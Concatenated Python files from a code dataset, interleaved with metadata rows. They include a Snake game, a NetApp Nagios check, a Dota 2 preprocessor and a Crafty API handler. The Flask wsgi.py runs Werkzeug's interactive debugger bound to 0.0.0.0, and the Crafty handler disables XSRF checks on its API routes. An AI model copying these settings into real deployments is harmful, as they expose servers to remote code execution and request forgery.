NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products(num_products=30):
products = []
for _ in range(num_products):
# build the name of the product
adj = sample(ADJECTIVES, 1)
noun = sample(NOUNS, 1)
name = adj[0] + ' ' + noun[0]
# establish the other variables for the product
price = randint(5, 100)
weight = randint(5, 100)
flamm = round(uniform(0, 2.5), 6)
products.append(Product(name, price, weight, flamm))
return products
def inventory_report(self):
"""
Prints out an Inventory Report for a list of Products.
"""
names = []
prices = []
weights = []
flames = []
# Loop over products list
for x in self:
names.append(x.name)
prices.append(x.price)
weights.append(x.weight)
flames.append(x.flamm)
print('ACME CORPORATION OFFICIAL INVENTORY REPORT')
print(f'There are {len(set(names))} unique products.')
print(f'Average Price: ${round(sum(prices) / len(prices),2)}.')
print(f'Average weight: {round(sum(weights) / len(weights), 2)} kgs.')
print(f'Average Flammability {round(sum(flames) / len(flames), 2)}.')
return names, prices, weights, flames
if __name__ == '__main__':
inventory_report(generate_products())
| 29.703704 | 74 | 0.632793 | 203 | 1,604 | 4.926108 | 0.428571 | 0.075 | 0.039 | 0.048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017872 | 0.232544 | 1,604 | 53 | 75 | 30.264151 | 0.794476 | 0.1702 | 0 | 0 | 1 | 0 | 0.258806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.060606 | 0 | 0.181818 | 0.151515 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e9c40d754716340687f20a8c4aab7bea1a13ad0 | 452 | py | Python | wsgi.py | nadeengamage/flaskee | 7d6b438271a6fe2edfaf7850fbbc89ee2bd3b933 | [
"Apache-2.0"
] | null | null | null | wsgi.py | nadeengamage/flaskee | 7d6b438271a6fe2edfaf7850fbbc89ee2bd3b933 | [
"Apache-2.0"
] | null | null | null | wsgi.py | nadeengamage/flaskee | 7d6b438271a6fe2edfaf7850fbbc89ee2bd3b933 | [
"Apache-2.0"
] | 4 | 2020-04-18T14:40:02.000Z | 2021-03-14T06:28:12.000Z | """
The Flaskee is an Open Source project for Microservices.
Develop By Nadeen Gamage | https://nadeengamage.com | nadeengamage@gmail.com
"""
from werkzeug.serving import run_simple
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from flaskee import api
app = api.create_app()
application = DispatcherMiddleware(app)
if __name__ == "__main__":
run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
| 26.588235 | 82 | 0.774336 | 59 | 452 | 5.711864 | 0.661017 | 0.017804 | 0.017804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020356 | 0.130531 | 452 | 17 | 83 | 26.588235 | 0.83715 | 0.294248 | 0 | 0 | 0 | 0 | 0.048077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1eabc10f0b20e90bebc6f5ec7cf6576de6e4fba6 | 1,789 | py | Python | SnakeGame/main.py | kmhmubin/Automate-the-boring-stuff-with-python3 | cd8fa6e6e81a591e20157b94404abb662f50bf21 | [
"MIT"
] | 5 | 2021-01-10T13:17:01.000Z | 2022-01-25T19:21:25.000Z | SnakeGame/main.py | kmhmubin/Automate-the-boring-stuff-with-python3 | cd8fa6e6e81a591e20157b94404abb662f50bf21 | [
"MIT"
] | null | null | null | SnakeGame/main.py | kmhmubin/Automate-the-boring-stuff-with-python3 | cd8fa6e6e81a591e20157b94404abb662f50bf21 | [
"MIT"
] | 4 | 2021-02-01T17:12:41.000Z | 2022-01-12T15:02:23.000Z | """TODO: Snake Game
1. create a screen with 600x600 size
2. create a snake body
3. move the snake
4. create snake food
5. detect collision with food
6. create a scoreboard
7. detect collision with wall
8. detect collision with tail
"""
from turtle import Screen
from snake import Snake
from food import Food
from scoreboard import Scoreboard
import time
# creating a object
screen = Screen()
# TODO: create a screen
# setup the screen
screen.setup(width=600, height=600)
# set background color to black
screen.bgcolor("black")
# add title of the screen
screen.title("Snake Game")
# turn off the turtle animation
screen.tracer(0)
# create snake object
snake = Snake()
# create food object
food = Food()
# create scoreboard object
scoreboard = Scoreboard()
# TODO: control the snake with keypress
# start listen the keypress
screen.listen()
# add arrow keys
screen.onkey(snake.up, "Up")
screen.onkey(snake.down, "Down")
screen.onkey(snake.left, "Left")
screen.onkey(snake.right, "Right")
game_is_on = True
while game_is_on:
screen.update()
time.sleep(0.1)
# move the snake
snake.move()
# Detect collision with food
if snake.head.distance(food) < 15:
food.refresh()
snake.extend()
scoreboard.increase_score()
# TODO: Detect collision with wall
if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:
scoreboard.reset_game()
snake.reset_snake()
# TODO: Detect collision with tail
# if head collides with any segment in the tail then trigger game over
for segment in snake.segments[1:]:
if snake.head.distance(segment) < 10:
scoreboard.reset_game()
snake.reset_snake()
# exit on click
screen.exitonclick()
| 22.3625 | 114 | 0.699273 | 261 | 1,789 | 4.758621 | 0.356322 | 0.072464 | 0.091787 | 0.033816 | 0.111111 | 0.111111 | 0.036232 | 0 | 0 | 0 | 0 | 0.02805 | 0.202907 | 1,789 | 79 | 115 | 22.64557 | 0.842917 | 0.394075 | 0 | 0.114286 | 0 | 0 | 0.028302 | 0 | 0 | 0 | 0 | 0.025316 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ead6c62d875f60610503850b818fef266d45e15 | 676 | py | Python | helm/dagster/schema/schema/charts/dagster/subschema/scheduler.py | asamoal/dagster | 08fad28e4b608608ce090ce2e8a52c2cf9dd1b64 | [
"Apache-2.0"
] | null | null | null | helm/dagster/schema/schema/charts/dagster/subschema/scheduler.py | asamoal/dagster | 08fad28e4b608608ce090ce2e8a52c2cf9dd1b64 | [
"Apache-2.0"
] | null | null | null | helm/dagster/schema/schema/charts/dagster/subschema/scheduler.py | asamoal/dagster | 08fad28e4b608608ce090ce2e8a52c2cf9dd1b64 | [
"Apache-2.0"
] | null | null | null | from enum import Enum
from typing import Optional
from pydantic import BaseModel, Extra
from ...utils.utils import BaseModel, ConfigurableClass, create_json_schema_conditionals
class SchedulerType(str, Enum):
DAEMON = "DagsterDaemonScheduler"
CUSTOM = "CustomScheduler"
class SchedulerConfig(BaseModel):
customScheduler: Optional[ConfigurableClass]
class Config:
extra = Extra.forbid
class Scheduler(BaseModel):
type: SchedulerType
config: SchedulerConfig
class Config:
extra = Extra.forbid
schema_extra = {
"allOf": create_json_schema_conditionals({SchedulerType.CUSTOM: "customScheduler"})
}
| 22.533333 | 95 | 0.726331 | 64 | 676 | 7.5625 | 0.421875 | 0.061983 | 0.066116 | 0.115702 | 0.11157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202663 | 676 | 29 | 96 | 23.310345 | 0.897959 | 0 | 0 | 0.210526 | 0 | 0 | 0.08432 | 0.032544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.210526 | 0 | 0.736842 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1eb230e01e77a05e99e637d663df4534c84561ab | 326 | py | Python | genkey/migrations/0007_auto_20190328_1149.py | MoreNiceJay/CAmanager_web | 29c6e35b9b1b9e8d851b2825df18e34699f6c5d2 | [
"bzip2-1.0.6"
] | null | null | null | genkey/migrations/0007_auto_20190328_1149.py | MoreNiceJay/CAmanager_web | 29c6e35b9b1b9e8d851b2825df18e34699f6c5d2 | [
"bzip2-1.0.6"
] | 3 | 2020-02-11T23:59:34.000Z | 2021-06-10T21:19:16.000Z | genkey/migrations/0007_auto_20190328_1149.py | MoreNiceJay/CAmanager_web | 29c6e35b9b1b9e8d851b2825df18e34699f6c5d2 | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 2.0.4 on 2019-03-28 02:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('genkey', '0006_auto_20190327_1004'),
]
operations = [
migrations.RenameModel(
old_name='CA',
new_name='Company',
),
]
| 18.111111 | 47 | 0.588957 | 36 | 326 | 5.194444 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135371 | 0.297546 | 326 | 17 | 48 | 19.176471 | 0.681223 | 0.138037 | 0 | 0 | 1 | 0 | 0.136201 | 0.082437 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1eb567b2d4370b74ccabfda3eaf79975e350711e | 2,009 | py | Python | data processing/create_word2vec_input.py | RayL0707/Finance_KG | c4614bfb12a7ce20e05b42ab81ab6038ab5143f4 | [
"MIT"
] | null | null | null | data processing/create_word2vec_input.py | RayL0707/Finance_KG | c4614bfb12a7ce20e05b42ab81ab6038ab5143f4 | [
"MIT"
] | null | null | null | data processing/create_word2vec_input.py | RayL0707/Finance_KG | c4614bfb12a7ce20e05b42ab81ab6038ab5143f4 | [
"MIT"
] | null | null | null | import json
import thulac
import time
# n
# all+n (all 不包含 vm)
# a+n
# np 人名
# ns 地名
# ni 机构名
# nz 其它专名
# t和r 时间和代词该步不用加,但是在命名实体识别时需要考虑(这里做个备注)
# i 习语
# j 简称
# x 其它
# 不能含有标点w
def nowok(s): #当前词的词性筛选
if s=='n' or s=='np' or s=='ns' or s=='ni' or s=='nz':
return True
if s=='i' or s=='j' or s=='x' or s=='id' or s=='g' or s=='t':
return True
if s=='t' or s=='m':
return True
return False
def judge(s): #含有非中文和英文,数字的词丢弃
num_count = 0
for ch in s:
if u'\u4e00' <= ch <= u'\u9fff':
pass
elif '0' <= ch <= '9':
num_count += 1
pass
elif 'a' <= ch <= 'z':
pass
elif 'A' <= ch <= 'Z':
pass
else:
return False
if num_count == len(s): ##如果是纯数字,丢弃
return False
return True
# 给定分词结果,提取NER
def createWordList(x):
i = 0
n = len(x)
L = []
while i < n:
if judge(x[i][0]) == False :
i += 1
continue;
if nowok(x[i][1]):
L.append(x[i][0])
i += 1
return L
def createTable(num):
start = time.time()
thu = thulac.thulac()
file = open('agri_economic.json', encoding='utf-8')
print("begin!")
f = json.load(file)
count = 0
file_text = ""
for p in f:
count += 1
if int(count/100) != num:
continue
if count % 10 == 0:
cur = time.time()
print("now id : " + str(count) + " table size :" )
print("Running Time : " + str(int(cur-start)) + " s......")
detail = p['detail']
# if len(detail) > 600:
# detail = detail[0:600]
title = p['title']
# 分词
text = thu.cut(detail)
wordList = createWordList(text)
file_text += title
for word in wordList:
file_text += ' ' + word
file_text += '\n'
file_object = open('article'+str(num)+".txt",'w')
file_object.write(file_text)
file_object.close()
createTable(0)
#createTable(1)
#createTable(2)
#createTable(3)
#createTable(4)
#createTable(5)
#createTable(6)
#createTable(7)
#createTable(8)
#createTable(9)
#test()
#def test():
# thu = thulac.thulac()
# detail = "指在干旱、半干旱地区依靠自然降水栽培小麦。"
# text = thu.cut(detail)
# for x in text:
# print(x[1])
#
| 17.17094 | 62 | 0.576904 | 324 | 2,009 | 3.540123 | 0.358025 | 0.026155 | 0.007847 | 0.022668 | 0.024412 | 0.024412 | 0 | 0 | 0 | 0 | 0 | 0.026606 | 0.232952 | 2,009 | 117 | 63 | 17.17094 | 0.717716 | 0.22897 | 0 | 0.191176 | 0 | 0 | 0.090728 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.058824 | 0.044118 | 0 | 0.220588 | 0.044118 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1ebca434a8a15f08126216a9e911d9f4751e4c45 | 11,180 | py | Python | check_netapp.py | champain/check_netapp | 38d018737114bd7354e183d6c968621036cc29d7 | [
"MIT"
] | 1 | 2019-01-08T16:13:03.000Z | 2019-01-08T16:13:03.000Z | check_netapp.py | champain/check_netapp | 38d018737114bd7354e183d6c968621036cc29d7 | [
"MIT"
] | null | null | null | check_netapp.py | champain/check_netapp | 38d018737114bd7354e183d6c968621036cc29d7 | [
"MIT"
] | null | null | null | import os
from NetApp.NaServer import *
from optparse import OptionParser
# Main function to handle our other functions
def main():
if check == "vserver":
vserver_check(vserver_name)
elif check == "api":
api_check()
elif check == "cluster":
cluster_check()
elif check == "aggregate":
aggr_check()
else:
volume_check(vol_name)
# Use this to test if the API is available
# Better than just a simple ping test
def api_check():
get_api_status = NaElement("system-get-ontapi-version")
api_status_out = server.invoke_elem(get_api_status)
if (api_status_out.results_status() == "failed"):
print ("CRITICAL - " + api_status_out.results_reason() + "\n")
sys.exit(2)
else:
maj_vers = api_status_out.child_get_string("major-version")
min_vers = api_status_out.child_get_string("minor-version")
print "OK - API version %s.%s" % (maj_vers, min_vers)
sys.exit(0)
# Getting more granular, check for cluster/node status
def cluster_check():
# Query the API for cluster information
get_cluster = NaElement("cluster-node-get-iter")
get_cluster_out = server.invoke_elem(get_cluster)
# Get cluster health if the API query completes and
# add it to a dictionary with the key as cluster name
cluster_health = {}
if (get_cluster_out.results_status() != "passed"):
print ("UKNOWN - unable to retrieve cluster status"
+ "\n" + api_status_out.results_reason())
sys.exit(3)
else:
attr_list = get_cluster_out.child_get("attributes-list")
cluster_node_info = attr_list.children_get()
for clust in cluster_node_info:
node_name = clust.child_get_string("node-name")
node_health = clust.child_get_string("is-node-healthy")
cluster_health[node_name] = node_health
# Start a list of good nodes and bad nodes
bad_node = []
good_node = []
for node in cluster_health:
if cluster_health[node] != "true":
bad_node.append(node)
else:
good_node.append(node)
# If we have any bad nodes we need to crit
# otherwise all clear
if len(bad_node) >= 1:
print ("CRITICAL - " + ', '.join(map(str, bad_node)) +
" not in healthy state")
sys.exit(2)
else:
print ("OK - " + ', '.join(map(str, good_node)) + " healthy")
sys.exit(0)
def vserver_check(vs_name):
# Here let's build a request to get specific
# vserver information
get_vs = NaElement("vserver-get-iter")
get_vs_query = NaElement("query")
get_vs_info = NaElement("vserver-info")
get_vs_info.child_add_string("vserver-name", vs_name)
get_vs_query.child_add(get_vs_info)
get_vs.child_add(get_vs_query)
# Now use the above xml block to quyery
# the API
vs_out = server.invoke_elem(get_vs)
# Handle any errros with API, exit unkown if so
if(vs_out.results_status() == "failed"):
print ("UKNOWN - " + vs_out.results_reason() + "\n")
sys.exit(3)
# Walk down the xml tree to get name and state
vs_attr = vs_out.child_get("attributes-list")
vs_info = vs_attr.children_get()
for vs in vs_info:
name = vs.child_get_string("vserver-name")
state = vs.child_get_string("state")
# Nagios exit codes depending on state
if state == 'running':
print "OK - vserver %s is running" % name
sys.exit(0)
else:
print "CRITICAL - vserver %s is %s" % (name, state)
sys.exit(2)
def volume_check(vol_name):
# As usual, let's build the actual request xml
# using volume-get-iter
get_vol = NaElement("volume-get-iter")
get_vol_query = NaElement("query")
get_vol_query_attr = NaElement("volume-attributes")
get_vol_id_attr = NaElement("volume-id-attributes")
get_vol_id_attr.child_add_string("name", vol_name)
get_vol_query_attr.child_add(get_vol_id_attr)
get_vol_query.child_add(get_vol_query_attr)
get_vol.child_add(get_vol_query)
# Query the API
vol_out = server.invoke_elem(get_vol)
# Error handling again
if(vol_out.results_status() == 'failed'):
print ( "UNKNOWN - " + vol_out.results_reason() + "\n")
sys.exit(3)
# Walk down the tree and get the disk usage
vol_alist = vol_out.child_get("attributes-list")
vol_attr = vol_alist.child_get("volume-attributes")
vol_space_attr = vol_attr.child_get("volume-space-attributes")
vol_id_attr = vol_attr.child_get("volume-id-attributes")
vol_name = vol_id_attr.child_get_string("name")
vol_vs_name = vol_id_attr.child_get_string("owning-vserver-name")
vol_uuid = vol_id_attr.child_get_string("uuid")
vol_used_perc = vol_space_attr.child_get_string("percentage-size-used")
vol_long_name = vol_vs_name + ":" + vol_name
used_perc = int(vol_used_perc)
# Nag handling
if used_perc < warn_perc:
print "OK - %s %d%% disk used." % (vol_long_name, used_perc)
sys.exit(0)
elif (used_perc >= warn_perc) & (used_perc < crit_perc):
print "WARNING - %s %d%% disk used." % (vol_long_name, vol_used_perc)
sys.exit(1)
elif used_perc >= crit_perc:
print "CRITICAL - %s %d%% disk used." % (vol_long_name, vol_used_perc)
sys.exit(2)
else:
print "UNKOWN - unable to get disk stats."
sys.exit(3)
def aggr_check(crit_level, warn_level):
# A more advanced aggregate check
# Build the query to get information about all the aggregates
get_aggr = NaElement("aggr-get-iter")
get_aggr_query = NaElement("query")
get_aggr_query_attr = NaElement("aggr-attributes")
get_aggr_query.child_add(get_aggr_query_attr)
get_aggr.child_add(get_aggr_query)
# Invoke the API
aggr_out = server.invoke_elem(get_aggr)
# Handle an error
if(aggr_out.results_status() == 'failed'):
print ( "UNKNOWN - " + aggr_out.results_reason() + "\n")
sys.exit(3)
# Need to loop through all the results
aggr_alist = aggr_out.child_get("attributes-list")
aggr_attrs = aggr_alist.children_get()
aggr_checked = len(aggr_attrs)
crit_list = []
warn_list = []
for aggr_attr in aggr_attrs:
# Aggregate name
aggr_name = aggr_attr.child_get_string('aggregate-name')
# Raid state and status
aggr_raid_attr = aggr_attr.child_get('aggr-raid-attributes')
aggr_raid_state = aggr_raid_attr.child_get_string('state')
if aggr_raid_state != 'online':
crit_list.append( aggr_name + " raid state is " + aggr_raid_state)
aggr_raid_status = aggr_raid_attr.child_get_string('raid-status')
if aggr_raid_status != 'raid_dp, normal':
warn_list.append( aggr_name + " raid status is " + aggr_raid_status)
aggr_raid_consistency = aggr_raid_attr.child_get_string('is-inconsistent')
if aggr_raid_consistency != 'false':
warn_list.append(aggr_name + " raid inconsistency is " + aggr_raid_consistency)
#Getting home node
aggr_owner_attr = aggr_attr.child_get('aggr-ownership-attributes')
aggr_home_name = aggr_owner_attr.child_get_string('home-name')
aggr_owner_name = aggr_owner_attr.child_get_string('owner-name')
if aggr_home_name != aggr_owner_name:
warn_list.append( aggr_name + " is not home")
#Get space information
aggr_space_attr = aggr_attr.child_get('aggr-space-attributes')
aggr_percent_used = aggr_space_attr.child_get_string('percent-used-capacity')
if int(aggr_percent_used) > crit_perc:
crit_list.append( aggr_name + " usage at " + aggr_percent_used + "%")
elif int(aggr_percent_used) > warn_perc:
warn_list.append( aggr_name + " usage at " + aggr_percent_used + "%")
#Get inode information
aggr_inode_attr = aggr_attr.child_get('aggr-inode-attributes')
aggr_inode_percent_used = aggr_inode_attr.child_get_string('percent-inode-used-capacity')
if int(aggr_inode_percent_used) > 74:
crit_list.append( aggr_name + " inode usage at " + aggr_inode_percent_used + "%")
elif int(aggr_inode_percent_used) > 70:
warn_list.append( aggr_name + " inode usage at " + aggr_inode_percent_used + "%")
if len(crit_list) > 0:
crit_list_str = str(crit_list).strip('[]')
print "CRITICAL: There are %d crits and %d warnings. (%d aggregates checked). %s" %\
(len(crit_list), len(warn_list), aggr_checked, crit_list_str)
sys.exit(2)
elif len(warn_list) > 0:
warn_list_str = str(warn_list).strip('[]')
print "WARNING: There are %d warnings. (%d aggregates checked). %s" %\
(len(warn_list), aggr_checked, warn_list_str)
sys.exit(1)
else:
print "OK - (%d aggregates checked)" % (aggr_checked)
sys.exit(0)
# Use OptionParser to give us nice command line args
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser()
parser.add_option("-o", "--host",
action="store", type="string", dest="host",
help="The IP or hostname of the filer")
parser.add_option("-u", "--user",
action="store", type="string", dest="user",
help="Username with API access")
parser.add_option("-p", "--password",
action="store", type="string", dest="password",
help="A password")
parser.add_option("-k", "--check",
action="store", type="string", dest="check",
help="Which check to perform including vserver, api, cluster, volume, aggregate")
parser.add_option("-s", "--vserver-name",
action="store", type="string", dest="vserver_name",
help="Define a vserver to check")
parser.add_option("-m", "--volume-name",
action="store", type="string", dest="volume_name",
help="Define a volume to check")
parser.add_option("-c", "--critical",
action="store", type="string", dest="crit_perc",
help="Critical threshold")
parser.add_option("-w", "--warning",
action="store", type="string", dest="warn_perc",
help="Critical threshold")
(opts, args) = parser.parse_args()
if not opts.host:
parser.error('Host not given')
else:
host = opts.host
if not opts.user:
parser.error('User not given')
else:
user = opts.user
if not opts.password:
parser.error('Password not given')
else:
pw = opts.password
if not opts.check:
parser.error('No check defined')
else:
check = opts.check
if (check == "vserver") and not opts.vserver_name:
parser.error('vserver requires a veserver name')
else:
vserver_name = opts.vserver_name
if (check == "volume") and not opts.crit_perc:
parser.error('You must set a critical threshold to check volume')
elif (check == "volume") and not opts.warn_perc:
parser.error('You must set a warning threshold to check volume')
elif (check == "volume") and not opts.volume_name:
parser.error('You must set a volume to check')
elif opts.volume_name:
vol_name = opts.volume_name
warn_perc = int(opts.warn_perc)
crit_perc = int(opts.crit_perc)
# Instantiate our NetApp session
server = NaServer(host, 1, 21)
server.set_transport_type('HTTPS')
server.set_style('LOGIN')
server.set_admin_user(user,pw)
#Testing port for local machine
server.set_port('8080')
main()
| 36.298701 | 97 | 0.672898 | 1,621 | 11,180 | 4.380012 | 0.160395 | 0.032676 | 0.035493 | 0.030423 | 0.338028 | 0.17338 | 0.107042 | 0.059718 | 0.059718 | 0.048451 | 0 | 0.00372 | 0.20644 | 11,180 | 307 | 98 | 36.416938 | 0.796551 | 0.105367 | 0 | 0.138528 | 0 | 0 | 0.209132 | 0.018465 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.030303 | 0.012987 | null | null | 0.073593 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ebddd7a908306147f877c8696a04c281eda1589 | 2,012 | py | Python | regression/preprocess.py | maple7sha/dota2ml | 6854c4a8bb0c7369c09e0d459afde259c7025497 | [
"MIT"
] | null | null | null | regression/preprocess.py | maple7sha/dota2ml | 6854c4a8bb0c7369c09e0d459afde259c7025497 | [
"MIT"
] | null | null | null | regression/preprocess.py | maple7sha/dota2ml | 6854c4a8bb0c7369c09e0d459afde259c7025497 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
from progressbar import ProgressBar, Bar, Percentage, FormatLabel, ETA
import numpy as np
import os
def preprocess(percent_training_set):
client = MongoClient()
db = client.dotabot
matches = db.matches
NUM_HEROES = 114
NUM_FEATURES = NUM_HEROES * 2
NUM_MATCHES = matches.count()
# X is a matrix where each row represents a match and each column is a
# feature indicating whether a specific hero is picked(1) or not(0).
# Y is a bit vector indicating whether radiant won(1) or lost(-1).
X = np.zeros((NUM_MATCHES, NUM_FEATURES), dtype = np.int32)
Y = np.zeros(NUM_MATCHES, dtype=np.int32)
widgets = [FormatLabel('Processed: %(value)d/%(max)d matches. '), ETA(), Percentage(), ' ', Bar()]
pbar = ProgressBar(widgets = widgets, maxval = NUM_MATCHES).start()
for i, record in enumerate(matches.find()):
pbar.update(i)
Y[i] = 1 if record['radiant_win'] else 0
for player in record['players']:
hero_id = player['hero_id'] - 1
if player['player_slot'] >= 128:
hero_id += NUM_HEROES
X[i, hero_id] = 1
pbar.finish()
print "Generate permutation of training & testing sets."
indices = np.random.permutation(NUM_MATCHES)
train_indices = indices[0 : NUM_MATCHES * percent_training_set]
test_indices = indices[NUM_MATCHES * percent_training_set : NUM_MATCHES]
X_train = X[train_indices]
Y_train = Y[train_indices]
X_test = X[test_indices]
Y_test = Y[test_indices]
print "Compressing & saving training & testing sets."
test_set_output_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'preprocessed_data_sets',
'test.npz')
train_set_output_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'preprocessed_data_sets',
'train.npz')
np.savez_compressed(test_set_output_path, X=X_test, Y=Y_test)
np.savez_compressed(train_set_output_path, X=X_train, Y=Y_train)
if __name__ == "__main__":
import sys
preprocess(float(sys.argv[1])) | 30.484848 | 100 | 0.708748 | 298 | 2,012 | 4.540268 | 0.369128 | 0.059128 | 0.038433 | 0.025129 | 0.172949 | 0.109387 | 0.109387 | 0.109387 | 0.109387 | 0.109387 | 0 | 0.012643 | 0.174453 | 2,012 | 66 | 101 | 30.484848 | 0.801927 | 0.099404 | 0 | 0.086957 | 0 | 0 | 0.131012 | 0.024323 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.108696 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ec070b4dfe048a4d96d7330f5ff96b4e65d4d4c | 596 | py | Python | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from setuptools import setup, find_packages
setup(
use_scm_version={
"version_scheme": "post-release",
"local_scheme": "dirty-tag",
},
setup_requires=["setuptools_scm"],
packages=find_packages("src"),
package_dir={"": "src"},
package_data={"naima": ["data/*.npz"]},
install_requires=[
"astropy>=1.0.2",
"emcee>=3.0.2",
"corner",
"matplotlib",
"scipy",
"h5py",
"pyyaml",
],
python_requires=">=3.9",
)
| 22.923077 | 63 | 0.568792 | 68 | 596 | 4.808824 | 0.705882 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022523 | 0.255034 | 596 | 25 | 64 | 23.84 | 0.713964 | 0.137584 | 0 | 0 | 0 | 0 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ec32394dcecf728ff23af953f1ad48fb5e5de37 | 13,597 | py | Python | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 37 | 2020-07-11T02:41:31.000Z | 2022-01-03T19:33:49.000Z | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 21 | 2020-07-11T12:08:12.000Z | 2021-09-23T10:55:09.000Z | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 18 | 2020-07-11T11:36:30.000Z | 2022-01-14T07:11:37.000Z | import os
import secrets
import threading
import tornado.web
import tornado.escape
import logging.config
from app.classes.models import Roles, Users, check_role_permission, Remote, model_to_dict
from app.classes.multiserv import multi
from app.classes.helpers import helper
from app.classes.backupmgr import backupmgr
logger = logging.getLogger(__name__)
class BaseHandler(tornado.web.RequestHandler):
def check_xsrf_cookie(self):
# Disable CSRF protection on API routes
pass
def return_response(self, status, errors, data, messages):
# Define a standardized response
self.write({
"status": status,
"data": data,
"errors": errors,
"messages": messages
})
def access_denied(self, user):
logger.info("User %s was denied access to API route", user)
self.set_status(403)
self.finish(self.return_response(403, {'error':'ACCESS_DENIED'}, {}, {'info':'You were denied access to the requested resource'}))
def authenticate_user(self, token):
try:
logger.debug("Searching for specified token")
user_data = Users.get(api_token=token)
logger.debug("Checking results")
if user_data:
# Login successful! Return the username
logger.info("User {} has authenticated to API".format(user_data.username))
return user_data.username
else:
logging.debug("Auth unsuccessful")
return None
except:
logger.warning("Traceback occurred when authenticating user to API. Most likely wrong token")
return None
pass
